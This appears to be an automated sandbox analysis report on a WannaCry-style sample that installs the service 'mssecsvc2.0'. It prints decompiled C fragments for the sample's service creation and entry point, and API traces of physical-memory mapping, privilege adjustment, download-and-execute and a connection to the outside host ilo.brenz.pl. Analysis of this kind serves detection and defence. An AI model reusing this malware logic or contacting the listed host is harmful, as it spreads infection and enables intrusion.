		_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
		if(_t17 != 0) {
			StartServiceA(_t17, 0, 0);
			CloseServiceHandle(_t17);
		}
		CloseServiceHandle(_t15);
		return 0;
	}
}

APIs
• sprintf.MSVCRT ref: 00407C56
• OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
• CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F89FB10,00000000), ref: 00407C9B
• StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
• CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
• CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
Strings
Memory Dump Source
• Source File: 00000004.00000002.663214895.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.663184131.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663260796.0000000000409000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663302461.000000000040A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663328344.000000000040B000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663379016.000000000040F000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663454036.0000000000431000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663555779.0000000000710000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.665288410.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
• String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
• API String ID: 3340711343-4063779371
• Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
• Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
• Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
• Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
/* Decompiler output from the sandbox (quality 86%, so some temporaries are mislabeled).
   Entry logic: store the module path at 0x70f760, then branch on argc. With two or more
   arguments (the "-m security" form used by the service registration) it opens the
   existing mssecsvc2.0 service and hands control to the service control dispatcher;
   otherwise it takes the E00407F20 path. */
E00408090() {
	char* _v4;
	char* _v8;
	intOrPtr _v12;
	struct _SERVICE_TABLE_ENTRY _v16;
	long _t6;
	void* _t19;
	void* _t22;

	_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);  /* 0x104 = MAX_PATH */
	/* Decompiler artifact: __p___argc() returns int* and its result reuses _t6,
	   so *_t6 below is argc; _t26 is an undeclared temporary holding argc - 2. */
	__imp____p___argc();
	_t26 =  *_t6 - 2;
	if( *_t6 >= 2) {
		_t19 = OpenSCManagerA(0, 0, 0xf003f);  /* SC_MANAGER_ALL_ACCESS */
		__eflags = _t19;
		if(_t19 != 0) {
			_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);  /* SERVICE_ALL_ACCESS */
			__eflags = _t22;
			if(_t22 != 0) {
				E00407FA0(_t22, 0x3c);  /* helper not shown in this excerpt */
				CloseServiceHandle(_t22);
			}
			CloseServiceHandle(_t19);
		}
		/* SERVICE_TABLE_ENTRY { lpServiceName, lpServiceProc } with ServiceMain at
		   0x408000, followed by the terminating { NULL, NULL } entry. */
		_v16 = "mssecsvc2.0";
		_v12 = 0x408000;
		_v8 = 0;
		_v4 = 0;
		return StartServiceCtrlDispatcherA( &_v16);
	} else {
		return E00407F20(_t26);
	}
}

APIs
• GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
• __p___argc.MSVCRT ref: 004080A5
• OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
• OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F89FB10,00000000,?,004081B2), ref: 004080DC
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
• CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
• StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
Strings
Memory Dump Source
• Source File: 00000004.00000002.663214895.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.663184131.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663260796.0000000000409000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663302461.000000000040A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663328344.000000000040B000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663379016.000000000040F000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663454036.0000000000431000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663555779.0000000000710000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.665288410.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
• String ID: mssecsvc2.0
• API String ID: 4274534310-3729025388
• Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
• Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
• Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
• Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
• NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
• MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
• CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
• UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
Strings
Memory Dump Source
• Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
• String ID: C:,$\Device\PhysicalMemory
• API String ID: 2985292042-1440550476
• Opcode ID: b4d3e096044a212734f125868e85b1e2327fa10042064e7aff92d63e5b5619a7
• Instruction ID: 89bc292a39abda77eba81180b1336a71123f95df307fbb064623dea506d6362f
• Opcode Fuzzy Hash: b4d3e096044a212734f125868e85b1e2327fa10042064e7aff92d63e5b5619a7
• Instruction Fuzzy Hash: 5A817671500208FFEB218F14CC89ABA7BADEF44704F504658ED1A9F295D7F2AF458BA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00B9344A
• NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00B93469
• MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00B93493
• CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00B934A0
• UnmapViewOfFile.KERNEL32(?), ref: 00B934B8
Strings
Memory Dump Source
• Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
• String ID: C:,$\Device\PhysicalMemory
• API String ID: 2985292042-1440550476
• Opcode ID: b4d3e096044a212734f125868e85b1e2327fa10042064e7aff92d63e5b5619a7
• Instruction ID: 8a1b030a29d6ff6369e34e1c161b1177c42ac616d87be63800df4deb6355de34
• Opcode Fuzzy Hash: b4d3e096044a212734f125868e85b1e2327fa10042064e7aff92d63e5b5619a7
• Instruction Fuzzy Hash: 31818B71500208FFEB248F14CC89AAA3BBCEF48B14F514568ED199B291D7F4AF45CA64
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
• NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
• MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
• CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
• UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
Strings
Memory Dump Source
• Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
• String ID: C:,$ysic
• API String ID: 2985292042-2852681185
• Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
• Instruction ID: 20dbb16ab5d0e33e58175ecc7424444a29ed84bf4ea1b595fcedbc50fe00d084
• Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
• Instruction Fuzzy Hash: D5115B74140608BFEB21CF10CC55FAA7A7DEF88704F50451CEA1A9E290EBF56F188A68
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00B9344A
• NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00B93469
• MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00B93493
• CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00B934A0
• UnmapViewOfFile.KERNEL32(?), ref: 00B934B8
Strings
Memory Dump Source
• Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
• String ID: C:,$ysic
• API String ID: 2985292042-2852681185
• Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
• Instruction ID: 83c528af91c7e0bf05e58f71dcead99598b4a9ba0ff4ede89f5b3b17820f9002
• Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
• Instruction Fuzzy Hash: AD116D70140608BBEB24CF14CC59FAA36BCEF88B04F51452CEA199B290E7F46F148A68
Uniqueness

Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetTempFileNameA.KERNEL32(?,00B927A3,00000000,?), ref: 00B927A8
                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00B927A3,00000000,?), ref: 00B927C3
                                                                                • InternetReadFile.WININET(?,?,00000104), ref: 00B927DD
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00B927A3,00000000,?), ref: 00B927F3
                                                                                • CloseHandle.KERNEL32(?,00000104,?,00000000,?,00B927A3,00000000,?), ref: 00B927FF
                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00B927A3), ref: 00B92823
                                                                                • InternetCloseHandle.WININET(?), ref: 00B92833
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00B9283A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
                                                                                • String ID:
                                                                                • API String ID: 3452404049-0
                                                                                • Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                                                                                • Instruction ID: 2db4c990009dd7595c00353e2347a3e3c39d4e7131d57356dcf057fcc475db04
                                                                                • Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                                                                                • Instruction Fuzzy Hash: A31180B1500606BBFB254F20DC4EFFF7A6DEF88B10F104529FA0699080DBF59E5196A8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate$MappingView
                                                                                • String ID: !$&$&$($@$nr
                                                                                • API String ID: 1961427682-1764398444
                                                                                • Opcode ID: bf04dd4e4360f2a7c1138d4e91d6eeb8138924affbd26b01491c77224000adc4
                                                                                • Instruction ID: 70d54eaa6d8cb414026f6c3a7bcc54b949e10ab183c4402b4bf19285d7a76c5b
                                                                                • Opcode Fuzzy Hash: bf04dd4e4360f2a7c1138d4e91d6eeb8138924affbd26b01491c77224000adc4
                                                                                • Instruction Fuzzy Hash: 8D823232505309EFDB26CF28C4457B97BBAEF41328F105259D81A8F295D3B69F94CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • lstrcpyW.KERNEL32(?,\BaseNamedObjects\reytVt), ref: 7FEA24BA
                                                                                • lstrlenW.KERNEL32(?), ref: 7FEA24C1
                                                                                • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 7FEA2516
                                                                                Strings
                                                                                • \BaseNamedObjects\reytVt, xrefs: 7FEA24B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateSectionlstrcpylstrlen
                                                                                • String ID: \BaseNamedObjects\reytVt
                                                                                • API String ID: 2597515329-2991043827
                                                                                • Opcode ID: 1f6d0fdb519297aa2f4b2c942eb0fea1a6789580d20f20054a6c5e42652ba7e7
                                                                                • Instruction ID: 5c983cd9f1cd20ee1585cb2043f0ac7b7c4d8b3eb9a0e14b844aaf5402aa3d02
                                                                                • Opcode Fuzzy Hash: 1f6d0fdb519297aa2f4b2c942eb0fea1a6789580d20f20054a6c5e42652ba7e7
                                                                                • Instruction Fuzzy Hash: 470181B0781344BAF7309B29CC4BF5B7929DF81B50F508558F609AE1C4DAB89A0483A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • lstrcpyW.KERNEL32(?,\BaseNamedObjects\reytVt), ref: 00B924BA
                                                                                • lstrlenW.KERNEL32(?), ref: 00B924C1
                                                                                • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 00B92516
                                                                                Strings
                                                                                • \BaseNamedObjects\reytVt, xrefs: 00B924B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateSectionlstrcpylstrlen
                                                                                • String ID: \BaseNamedObjects\reytVt
                                                                                • API String ID: 2597515329-2991043827
                                                                                • Opcode ID: 1f6d0fdb519297aa2f4b2c942eb0fea1a6789580d20f20054a6c5e42652ba7e7
                                                                                • Instruction ID: 680601ef21d2206de906d06a7dabd6da05f40caf335e257e0c27b3e93d30fa21
                                                                                • Opcode Fuzzy Hash: 1f6d0fdb519297aa2f4b2c942eb0fea1a6789580d20f20054a6c5e42652ba7e7
                                                                                • Instruction Fuzzy Hash: 030181B0781344BAF7309B29CC4BF5B7D69DF81B50F508558F609AE1C4DAB89A0483A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtOpenSection.NTDLL(?,0000000E), ref: 7FEA255E
                                                                                Strings
                                                                                • \BaseNamedObjects\reytVt, xrefs: 7FEA254B
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: OpenSection
                                                                                • String ID: \BaseNamedObjects\reytVt
                                                                                • API String ID: 1950954290-2991043827
                                                                                • Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                • Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
                                                                                • Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                • Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 7FEA252F: NtOpenSection.NTDLL(?,0000000E), ref: 7FEA255E
                                                                                • NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 7FEA25A4
                                                                                • CloseHandle.KERNEL32(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,7FEA0815), ref: 7FEA25AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Section$CloseHandleOpenView
                                                                                • String ID:
                                                                                • API String ID: 2731707328-0
                                                                                • Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                • Instruction ID: 3cc34a18b6b0f74ef45f64819b33cb598c6401d77195fbf03454f98489c8026e
                                                                                • Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                • Instruction Fuzzy Hash: 9A21F970301646BBDB18DE65CC55FBA7369FF80648F401118E85ABE1D4DBB2BA24C758
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 3615134276-0
                                                                                • Opcode ID: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                • Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
                                                                                • Opcode Fuzzy Hash: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                • Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 7FEA249B
                                                                                • NtWriteVirtualMemory.NTDLL ref: 7FEA24A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MemoryVirtual$ProtectWrite
                                                                                • String ID:
                                                                                • API String ID: 151266762-0
                                                                                • Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                • Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
                                                                                • Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                • Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 3615134276-0
                                                                                • Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                • Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
                                                                                • Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                • Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                                                                                • Instruction ID: 599e4210a27b95691828082bf071d632d483ec5813d8a2b375e76b2b2bcd3a21
                                                                                • Opcode Fuzzy Hash: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                                                                                • Instruction Fuzzy Hash: 6A31F5326006158BEB148E38C94079AB7F2FB84704F10C63CE557FB594D676F6898BC0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                                                                                • Instruction ID: 1a2b5fff46c5b670e9fe0eeaeab5ab2a4880aafd6ba5f40914bebdbede8120cd
                                                                                • Opcode Fuzzy Hash: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
                                                                                • Instruction Fuzzy Hash: 3D310532A006159BEF188F38C845B9AB7E2FB94304F10867CE556E7580E675EA898BC0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e790c00163a7874b300154a8828074cc8f9e884629fc42e83eff5d62811f4d29
                                                                                • Instruction ID: 2ef5a1d6ad88e75d5911a7d47f6b3f6173312025dec9f347c6a54f7b135bd9c7
                                                                                • Opcode Fuzzy Hash: e790c00163a7874b300154a8828074cc8f9e884629fc42e83eff5d62811f4d29
                                                                                • Instruction Fuzzy Hash: 6E0128327053419BC7219F38CCC4FAEBBA2EBC4734F118325E6540E189D632E241C661
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e790c00163a7874b300154a8828074cc8f9e884629fc42e83eff5d62811f4d29
                                                                                • Instruction ID: 382eb8fb3695c9b87e3f5c6b506c6dbfe6ba806449a21943bcb5c8ce0e9fc978
                                                                                • Opcode Fuzzy Hash: e790c00163a7874b300154a8828074cc8f9e884629fc42e83eff5d62811f4d29
                                                                                • Instruction Fuzzy Hash: 9E01F1322141459FCB20BF28CC89A9EBBE2EB89734F1083B4F4945A185D631A2818691
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(7FEA3F83), ref: 7FEA3F8F
                                                                                • WSAStartup.WS2_32(00000101), ref: 7FEA3FCE
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                                                                                • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                                                                                • wsprintfA.USER32 ref: 7FEA4179
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
                                                                                • GetTickCount.KERNEL32 ref: 7FEA41F6
                                                                                • RtlExitUserThread.NTDLL(00000000), ref: 7FEA4322
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Similarity
                                                                                • API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
                                                                                • String ID: C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$ilo.brenz.pl
                                                                                • API String ID: 3316401344-1341573493
                                                                                • Opcode ID: ddb8fe4bd5fdd210e26ff7bad9c73aa659b133641d5d7bf307872437a698338a
